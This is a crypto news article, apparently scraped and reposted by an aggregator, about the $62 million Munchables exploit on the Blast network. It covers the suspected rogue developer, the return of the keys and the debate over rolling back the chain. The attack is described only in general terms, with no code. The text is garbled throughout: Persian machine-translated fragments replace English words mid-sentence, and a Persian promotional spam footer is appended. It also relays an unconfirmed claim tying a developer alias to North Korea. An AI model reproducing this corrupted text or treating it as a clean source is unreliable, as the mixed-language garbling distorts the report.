An NFT game on the Blast network lost $62 million in an onchain exploit, but some industry watchers have suggested that the attack was an inside job planned by a rogue developer.
ارسال شده در 27 مارس 2024 ساعت 2:44 صبح EST.
Munchables, a non-fungible token (NFT) game built on Ethereum layer 2 network Blast, suffered a multi-million dollar exploit on Tuesday, with blockchain sleuths raising questions about the authenticity of the protocol.
تیم پشت پروژه تایید شده that the protocol has been compromised in an X post, saying that they were tracking the exploiter’s movements and attempting to block the transactions.
Exploiter address 17.4K ETH ($62.5M)
0x6e8836f050a315611208a5cd7e228701563d09c5
— ZachXBT (@zachxbt) مارس 26، 2024
Blockchain sleuth ZachXBT responded to Munchables’ X post with a link to the exploiter’s wallet address, which received a transfer of 17,413 ether (ETH), according to داده ها from block explorer Blastscan. At current prices, the value of the stolen funds amounted to $62.6 million.
According to Solidity developer “0xQuit” on X, there was nothing complex about this exploit, based on the nature of the underlying smart contract, which was “dangerously upgradeable” with an unverified implementation contract.
“The exploit appears to be as simple as asking the contract politely for 17,400 ether,” said 0xQuit, adding that “the attack does require you to be an authorized party and was probably an inside job by a rogue dev.”
That rogue developer may be based in North Korea, according to ZachXBT, who linked a developer profile with the alias “Werewolves0943.”
not even joking it’s this clown pic.twitter.com/V0Cg4st91t
— ZachXBT (@zachxbt) مارس 26، 2024
0xQuit اشاره کرد that the exploit seems to have been planned from the beginning, with the exploiter manually manipulating storage slots to assign himself a large ether balance before changing the contract implementation back into one that appeared legitimate.
“Then he simply withdrew that balance once TVL [Total Value Locked] was juicy enough,” said 0xQuit.
Around seven hours after the exploit was announced, the Munchables team issued an update saying that the rogue developer in question had agreed to share the keys to the funds without imposing any conditions.
How are you still referring to this person as the “Munchables developer”…you not gonna fire them?
— خم کن (@0xBender) مارس 27، 2024
The team later confirmed that the developer had shared all the private keys required to recover the funds, and said that they had set up a treasury pool for affected users to recover their assets.
“We’ve just opened up the final proposal for all users to vote on the Munchables compensation date. Those who vote within the next 12 hours will receive a double allocation,” said the Munchables team.
Reversing the damage
Some users on Crypto Twitter نام for Blast to “roll back the chain” — a network upgrade that would, in effect, reverse the hack. To do this, Blast developers would have to force an invalid state root, which would erase the hacked transaction.
Expectedly, this led to much debate around whether changing the state of the chain goes against the ethos of decentralization or whether a situation like this warrants the necessary intervention.
There’s a reason decentralization is important.
This Blast hack shows us why. If they can arbitrarily change the chain state to reverse the hack–which they can–what’s stopping them from stealing user funds?
Even if all the validators on an L1 are compromised, no one can…
— ZenLlama (@zen_llama) مارس 27، 2024
”blast executing a bridge upgrade would destroy the facade of decentralization”
what the fuck are you guys talking about
what ”facade of decentralization”?
there is no fucking mystery here. it is 100% centralized
rollback the chain you absolute morons pic.twitter.com/Cv9YCYKKZs
— اریک وال | OP_😺 (@ercwl) مارس 27، 2024
If $62mm more of hacked funds goes to NK (or is alleged to go to NK), it’s night night for crypto in the U.S.
Roll back the chain. Blast is a month old and can afford the debate.
— رایان سلکیس (d/acc) 🇺🇸 (@twobitidiot) مارس 27، 2024
“As I understand the situation, they aren’t rolling back the chain, they are submitting an invalid state root from the layer 2 sequencer down onto layer 1 Etheruem,” said Tim Clancy, an industry watcher who identifies as an Ethereum maximilast, to Unchained.
He explained that the most important thing about a layer 2 is a provable and trustless “exit window,” which is a period of time that allows someone to escape the layer 2 with all assets.
“If there is no exit window, the [layer 2] is 100% centralized and the operators can act to steal your assets,” he said.
مطابق با L2 Beat, Blast does not have an exit window for users to exit in case of an unwanted upgrade.
“In this case of Blast abusing their lack of exit window to steal the attacker’s funds, I believe they are unfortunately setting a precedent that regulators or authorities may use to attack honest and talented teams that are actually believers in this space and actually building trustless scaling solutions,” Clancy said.
March 27 04:46am ET: This article’s headline has been updated.
- محتوای مبتنی بر SEO و توزیع روابط عمومی. امروز تقویت شوید.
- PlatoData.Network Vertical Generative Ai. به خودت قدرت بده دسترسی به اینجا.
- PlatoAiStream. هوش وب 3 دانش تقویت شده دسترسی به اینجا.
- PlatoESG. کربن ، CleanTech، انرژی، محیط، خورشیدی، مدیریت پسماند دسترسی به اینجا.
- PlatoHealth. هوش بیوتکنولوژی و آزمایشات بالینی. دسترسی به اینجا.
- منبع: https://unchainedcrypto.com/third-party-blast-bridges-disabled-after-munchables-loses-62-million-in-exploit/